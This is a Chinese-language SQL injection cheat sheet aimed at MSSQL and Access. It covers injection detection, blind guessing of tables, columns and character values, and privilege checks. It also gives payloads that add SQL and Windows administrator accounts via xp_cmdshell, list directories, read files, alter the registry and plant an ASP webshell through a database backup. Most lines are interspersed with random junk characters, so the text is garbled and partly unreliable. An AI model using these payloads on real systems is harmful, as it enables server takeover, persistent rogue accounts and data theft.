1.判断是否有注入;and 1=1 ;and 1=2 E#IiyZ
2.初步判断是否是mssql ;and user>0 G_4K+
-K
~z-?rW
3.注入参数是字符'and [查询条件] and ''=' M6o
xtt4
f}evw K[S
4.搜索时没过滤参数的'and [查询条件] and '%25'='
ox i
a}
P>yG/:W;
5.判断数据库系统 HM(bR"E
nm{'HH-4
;and (select count(*) from sysobjects)>0 mssql ntA[[OIFO
yH0yO*RZ
;and (select count(*) from msysobjects)>0 access CWobvR)e
/h}wM6pg
|,M#8NOp:
t(uB66(_F
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \S|VkPv
#'G7mAoA
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 U#UVenp@
2ZTyo7P
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ^^t]vojX
;:8jxkx6%
9.(1)猜字段的ascii值(access) 'AAF/ 9
JWUv H
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 O|^6UH
h^[ppc{Z
(2)猜字段的ascii值(mssql) "R\\\I7u
;ZE<6;#3IP
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ~,M;+T}[r
$z`cMQ r
10.测试权限结构(mssql)
bSeL"
]/<Qn-BbU
fxtYo,;$
CwH)6uA
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- XSHwE)m
6f5sIg
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- {8>_,z^P)
~NxoF
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- q)z1</B-
{_k!!p6
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Ekg N6S`}
u}@%70A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }~Kyw7?
=vqE=:X6
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- B 3,ig9
=Y=^]ayO/
;and 1=(select IS_MEMBER('db_owner'));-- DY+8m8!4H
[u9S+:7"
a s<q
ui#1 +p3G
11.添加mssql和系统的帐户 MR l*rK
fi-&[llg
;exec master.dbo.sp_addlogin username;-- NdED8 iRc
;exec master.dbo.sp_password null,username,password;-- H?/cG_^y0
gp|7{}Q{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- K&"Pm9
~1wdAq`'a
;exec master.dbo.xp_cmdshell 'net user username password e&a[k
5)SZd)
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- !\D]\|Bo
mGyIr kE
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Y$`hudJ&
iR}i42Cu
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ;HLMU36q
BoiIr[ (
Y[8co<p
Ll E_{||h
12.(1)遍历目录 +/_B/[e<>
0.+Z;j
;create table dirs(paths varchar(100), id int) Z@aL"@2]a
J'Mgj$T $
;insert dirs exec master.dbo.xp_dirtree 'c:\' !+26a*P
&fNE9peQFa
;and (select top 1 paths from dirs)>0 aBtfZDCfzp
9Nbg@5(
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) HEfA c
qu~"C,
'8pPGh9D
s"Pk-Dv
(2)遍历目录 a!J ow?(
)eGu4iEPM
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- nR |LV'(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `R=_t]ie
GHsdLe=t0#
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 CH_Dat>
KL\=:iWA
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 2,QApW_Y
-0J<R;cVs
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 K}*p(1$u
;NVTn<Uj
O}iKPY8K
w#bbm'j7r
13.mssql中的存储过程 )*<d1$aM
% |Gzht\
xp_regenumvalues 注册表根键, 子键 ^A$XXH'
28qWC~/9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 3'@jRK
`YU:kj<6
xp_regread 根键,子键,键值名 ]X;*\-
L5|;VH
;exec xp_regread (IQ L`3f%
cw-JGqLx
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 R#^pNJN
l{SPV8[i
xp_regwrite 根键,子键, 值名, 值类型, 值 2o3k=hKS
[67f; ?b
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 <+JFal
XlcDF|?{.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 zgOwSg8
<y/AEY1
xp_regdeletevalue 根键,子键,值名 :qKY@-t7H
"YU~QOGx@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 8}b[Q/h!
bH]!~[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %SFR.U0}yK
gM[
J'DMW
h/~BUg'
5Kxk9{\8
14.mssql的backup创建webshell kF~e3A7C
qCT\rZU
use model m&c(N
k"-#ox!
create table cmd(str image); 6HQwL\r79
#mxfU>vQ:
insert into cmd(str) values (''); JJ06f~Iw[
hds4_
backup database model to disk='c:\l.asp'; @a3v[}c*
>x0lSL0y
VQ}3r)ch
*%+buHe
15.mssql内置函数 OvG |=
\`# 0,pLr
;and (select @@version)>0 获得Windows的版本号 YhR"_
m3e49 bP
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Av4E?@R
%E_{L
;and (select user_name())>0 爆当前系统的连接用户 (19<8a9G
xM,(|p(
;and (select db_name())>0 得到当前连接的数据库 p[:%Ck"$7
Bq`kVfx
,6pH *b$
2 ZXF_ o
16.简洁的webshell wajhFBJ
C{^@. 8:
use model Uwa1)Lwn
^Z+D7Q
create table cmd(str image); yt,;^o^
z*1K<w8
insert into cmd(str) values (''); oPZ4}>uV
6GvnyJ{[
backup database model to disk='g:\wwwtest\l.asp';